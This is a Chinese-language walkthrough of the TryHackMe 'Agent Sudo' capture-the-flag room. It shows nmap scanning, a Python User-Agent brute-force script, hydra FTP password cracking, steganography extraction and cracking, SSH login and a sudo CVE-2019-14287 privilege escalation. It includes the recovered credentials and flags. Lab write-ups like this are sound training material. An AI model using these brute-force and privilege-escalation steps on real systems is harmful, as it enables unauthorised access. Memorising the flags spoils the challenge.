[Day18] THM AgentSudo

• URL : https://tryhackme.com/room/agentsudoctf
• IP : 10.10.119.64

Recon

• 老梗 nmap -A 10.10.119.64
  • 
  • 发现有开
    • FTP
    • SSH
    • HTTP
• 尝试进入 HTTP
  • 
  • 看到他说需要在 useragent 放 Codename (机密代号)
  • 又说 Dear agent, 下面有说 Agent R
  • 所以基本上可以先猜测 Agent A 到 Z

爆猜机密代号

• 浏览器没有太方便，所以我们先把浏览器 request 转 curl
  • 
  • 对着 F12 的 Reuest 右键，Copy as cURL
  • curl 'http://10.10.119.64/' -H 'User-Agent: meow' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0, no-cache' -H 'Pragma: no-cache'
• curl 转 Python request
  • 我使用这个网站 https://curl.trillworks.com/
    • 把 curl 贴上就可以自动转 python 的 request 了
• 接下来写一段扣爆破

import requests


for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
	headers = {
		'User-Agent': i ,
		'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
		'Accept-Language': 'en-US,en;q=0.5',
		'Connection': 'keep-alive',
		'Upgrade-Insecure-Requests': '1',
		'Cache-Control': 'max-age=0, no-cache',
		'Pragma': 'no-cache',
	}

	response = requests.get('http://10.10.119.64/', headers=headers).text
	print(i,len(response))

• 因为如果猜错他会回传的字都是一样的，那就猜测输入正确时，他回传的东西会不一样，所以最简单的方法可以用字串长度来比对，输入错误时长度是 218
• 
• 运气很好，C 就猜到ㄌ
• 用 User-Agent:C 发 request
  • 
    • 在 Firefox 上使用右键， Edit and Resend
  • 
    • 修改 User-Agent 为 C 并送出
  • 可以发现他自动跳转到这个网页
    • http://10.10.119.64/agent_C_attention.php
    • 
    • 内文中发现了 Agent C 叫做 chris
    • 而且他的主管在嘴他说使用弱密码

FTP

• 尝试爆破 FTP
  • 因为 nmap 有扫到 ssh 跟 ftp，接下来尝试 FTP
  • 透过 Hydra + Rockyou 字典来爆
    • hydra -l chris -P /opt/rockyou.txt ftp://10.10.119.64
  • 
  • 可以了解到帐号为 chris
  • 密码为 crystal
• 尝试登入 FTP
  • ftp 10.10.119.64
  • 
  • 输入 ls 观察 ftp 里面的档案
    • 
  • 输入 get 档名 把档案依序载下来
  • 
• 观察 txt 档案
  • cat To_agentJ.txt
  • 
  • 他说两张照片都是假ㄉ，里面有藏东东

Stego

• 起手式 strings
  • strings cutie.png
  • 
  • 可以发现里面藏了一点点的字，但是用奇怪的编码或加密QQ
• 透过 binwalk 观察是否里面有藏档案
  • 
  • 发现 png 後面塞了一个 zip
• 透过 foremost 解出里面的档案
  • foremost cutie.png
  • 
  • 会发现资料夹里面有一包 zip
  • 
• 解压缩 zip
  • 用最直觉的 unzip
    • 
    • 会发现喷错
    • 跟据这篇的讲法，可以用 7z 来解
  • 7z x 00000067.zip
    • 
    • 用 7z 解，会发现 zip 需要密码
• 爆破 zip 密码
  • 先把 zip 转成 约翰格式
  • zip2john 00000067.zip > j.txt
  • john j.txt --wordlist=/opt/rockyou.txt
  • 就可以取得密码为 alien
  • 
• 解压缩 zip
  • 7z x 00000067.zip
  • 并使用密码 alien 即可解压完毕
  • 
  • 解压内容可以看到一组奇怪的密码 QXJlYTUx
  • 透过 base64 解码
    • base64 -d <<< QXJlYTUx
      • 
    • 即可获得 Area51
• 接下来看到另外一个档案
  • cute-alien.jpg
  • 这边使用 steghide 进行解密
  • steghide extract -sf cute-alien.jpg
    • 并搭配 Area51
  • 
    • 发现成功的解出了 message.txt
    • 
• 我们可以发现文章内
  • 使用者 : james
  • 密码 : hackerrules!

SSH

• 透过 SSH 进行登入
  • ssh [email protected]
  • 
• 寻找到 user_flag.txt
  • 
  • b03d975e8c92a7c04146cfa7a5a313c7

提权

• 输入 sudo -l
  • 
  • 所以我们不能以 root 身分执行/bin/bash
• What is the incident of the photo called?
  • 里面还找到了一张照片
  • 
  • 透过 Google 以图搜图可以找到这篇新闻
  • Roswell alien autopsy
• 继续提权
  • 透过 scp 上传 Linpeas
    • 本机
      • scp linpeas.sh [email protected]:/tmp
      • 
    • 远端
      • bash linpeas.sh | tee meow.txt
• 可以观察到 Linpeas 把 sudo 版本变红色
  • 
  • 透过Google Sudo 1.8.21p2
    • 可以找到 CVE-2019-14287
    • https://www.exploit-db.com/exploits/47502
  • 远端机器刚好有 python 跟 vim
    • 那就直接开 vim 把 exploit 给贴上
    • 
• 把 python exploit code 给 run 起来
  • 询问使用者名称，就输入 james
  • 
  • 成功提权!
• 取得 root flag
  • 
  • b53a02f55b57d4439e3341834d70c062
• (Bonus) Who is Agent R?
  • 信最後 有写 DesKel aka Agent R
  • 阿不是阿，你名字里哪里有 R ㄌ ?__?